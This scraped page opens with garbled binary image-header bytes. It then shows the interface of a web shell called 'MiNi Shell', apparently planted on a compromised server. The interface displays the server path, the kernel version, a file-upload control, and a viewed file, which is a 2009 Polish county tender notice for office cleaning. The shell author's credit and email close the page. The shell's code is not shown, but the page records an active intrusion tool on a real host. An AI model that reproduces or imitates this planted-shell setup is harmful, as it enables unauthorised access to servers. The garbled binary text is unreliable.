JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090224/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090224/39578-N-2009.html

<p class="kh_header"><b>Piła: Wykonywanie usług utrzymania czystości w pomieszczeniach Starostwa Powiatowego w Pile</b><br>
<b>Numer ogłoszenia: 39578 - 2009; data zamieszczenia: 24.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Pilski reprezentowany przez Zarząd Powiatu w Pile , al. Niepodległości 33/35, 64-920 Piła, woj. wielkopolskie, tel. 067 2109330, 2109337, faks 067 2109332.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie usług utrzymania czystości w pomieszczeniach Starostwa Powiatowego w Pile.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. 	Zakres zamówienia obejmuje utrzymanie czystości w pokojach biurowych, archiwach, ciągach komunikacyjnych, toaletach i windach, mycie okien, pranie firan i zasłon oraz wykładzin podłogowych.
2.	Czynności wchodzące w skład przedmiotu zamówienia są wymienione w załączniku nr 7 do SIWZ i winny być dokonywane z częstotliwością określoną w tym załączniku, z tym, że pokoje plombowane należy sprzątać w godzinach pracy Starostwa (poniedziałek 1300-1600, wtorek-piątek 1300-1530), a pozostałe pomieszczenia - poniedziałek 1600 - 1930, wtorek-piątek 1530 - 1930.
3.	Na skutek zmiany własności budynków trwa przenoszenie pracowników Starostwa Powiatowego z budynku przy ul. Dzieci Polskich 26 do budynku przy Al. Niepodległości 33/35. Zakłada się, że okres przejściowy potrwa do końca I półrocza 2009 r. W przypadku zmiany sprzątanej powierzchni należność miesięczna będzie obliczana na podstawie cen jednostkowych podanych w ofercie Wykonawcy. Wszystkie zmiany będą wprowadzane aneksem do umowy.
Ilość i powierzchnię poszczególnych pomieszczeń w budynkach, a także inne informacje niezbędne do wykonania kalkulacji kosztów sprzątania zawiera załącznik nr 5 do SIWZ - Wykaz pomieszczeń i wyposażenia. Załącznik ten zawiera wykaz pomieszczeń, które są aktualnie użytkowane przez Starostwo Powiatowe. Natomiast w załączniku nr 6 do SIWZ - zawarty jest wykaz pomieszczeń, jakie będą docelowo użytkowane przez Starostwo Powiatowe od dnia 1 lipca 2009 r..
Zamawiający zastrzega sobie możliwość zmiany pomieszczeń do sprzątania w poszczególnych budynkach.
4.	Wykonawca jest zobowiązany do dostarczania i utrzymywania w dozownikach stosownej ilości papieru toaletowego, mydła w płynie i ręczników papierowych- ich koszt należy wliczyć w cenę usługi.
Wymagania:
- mydło w płynie - antybakteryjne,
-	ręczniki papierowe składane- jednowarstwowe, kolor zielony lub niebieski,
- papier toaletowy - jednowarstwowy, gramatura papieru 37- 40 g/m2, kolor naturalny.
5. 	Wykonawca będzie używał, przy realizacji przedmiotu zamówienia, środków chemicznych przeznaczonych do profesjonalnego sprzątania, posiadających wymagane przepisami prawa atesty (Państwowy Zakład Higieny).
6.	Zamawiający wymaga, aby osoby, którymi dysponuje wykonawca, sprzątające pomieszczenia Starostwa Powiatowego posiadały identyfikatory, zawierających imię i nazwisko oraz nazwę Wykonawcy.
7.	Zamawiający zapewni pomieszczenie na szatnie dla pracowników Wykonawcy oraz pomieszczenie do przechowywania sprzętu i środków czystości.
8.	Warunki płatności faktur: 14 dni licząc od dnia poprawnie złożonej faktury..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1.	Posiadają uprawnienia do wykonywania określonych prac lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia. 
W tym względzie udokumentują, że:
a)	w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, realizowali lub realizują co najmniej jedno zamówienie polegające na usłudze sprzątania minimum 4 000 m2 powierzchni (pokoje biurowe, ciągi komunikacyjne, pomieszczenia sanitarne) w budynku użyteczności publicznej;
b)	dysponują sprzętem do wykonania zamówienia - Wykonawca winien dysponować:
- odkurzaczami przeznaczonymi do profesjonalnego sprzątania,
- urządzeniem piorącym do wykładzin,
- zestawami do mycia ręcznego.
3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia: Zamawiający wymaga, aby suma gwarancyjna na jedno i wszystkie zdarzenia z tytułu odpowiedzialności kontraktowej wynosiła co najmniej 150.000 złotych, natomiast z tytułu odpowiedzialności deliktowej - 50.000 złotych.
4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy- Prawo zamówień publicznych.
5.	Podwykonawstwo
Zamawiający nie dopuszcza zatrudnienia podwykonawców. Wykonawca jest zobowiązany wykonać całość zadania własnymi siłami.
Wymienione wyżej warunki zostaną uznane przez Zamawiającego za spełnione, jeżeli złożone przez Wykonawcę, wymagane dokumenty, o których mowa w punkcie 7 SIWZ, potwierdzą ich spełnianie.
Ocena spełniania poszczególnych warunków odbędzie się na zasadzie spełnia, nie spełnia. Nie spełnienie choćby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia i dokumenty składające się na ofertę:
Dokumenty, które należy załączyć do oferty:
1.	Wypełniony formularz Oferta, stanowiący załącznik nr 1 do SIWZ.
2.	Wypełniony formularz - Kalkulacja kosztów sprzątania- załącznik nr 8 do SIWZ.
Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu:
3.	Odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy do terminu składania ofert.
4.	Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż trzy miesiące przed upływem terminu składania ofert.
5.	Oświadczenie o spełnianiu warunków udziału w postępowaniu załącznik nr 2 do SIWZ.
6.	Informację o doświadczeniu Wykonawcy - wykaz wykonanych w okresie ostatnich trzech  lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług na formularzu zgodnym z treścią załącznika nr 3 - Doświadczenie Wykonawcy, na potwierdzenie warunku określonego w pkt. 6 ppkt 2 a)
Do informacji Wykonawca winien załączyć dokumenty potwierdzające, że wymienione usługi zostały wykonane należycie wraz z informacją o powierzchni na jakiej były świadczone usługi.
7.	Informację o sprzęcie niezbędnym do realizacji zamówienia - na formularzu zgodnym z treścią załącznika nr  4 - Wykaz sprzętu.  
8.	Kserokopię polisy lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony w zakresie określonym w pkt 6 ppkt 3..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.pila.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
Al. Niepodległości 37
64-920 Piła
pokój 304.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2009 godzina 10:00, miejsce: Starostwo Powiatowe
Al. Niepodległości 33/35
64-920 Piła
pokój 111.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com